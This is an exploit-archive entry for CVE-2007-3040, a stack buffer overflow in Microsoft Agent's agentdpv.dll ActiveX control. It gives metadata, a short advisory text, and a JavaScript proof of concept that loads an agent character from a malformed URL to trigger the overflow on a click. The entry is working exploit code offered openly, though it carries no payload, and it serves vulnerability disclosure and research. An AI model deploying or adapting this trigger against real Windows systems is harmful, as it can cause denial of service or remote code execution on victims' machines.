[] NeoSense

Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow

Author: Yamata Li
type: remote
platform: windows
port: 
date_added: 2007-09-11 
date_updated: 2013-12-29 
verified: 1 
codes: CVE-2007-3040;OSVDB-36934 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/25566/info

Microsoft Agent (agentsvr.exe) is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately bounds-check user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.

<script language="javascript">
function document::OnClick() {
        var agent, character, url;
        agent = new ActiveXObject("Agent.Control.2");
        agent.connected = true;
        agent.Characters.Load("Genie", "http:///");
        character = agent.Characters.Character("Genie");
        character.Show();
        character.Think ("brazil owns!");
        character.Speak('brazil owns!');
        character.Play('Processing');
}
</script>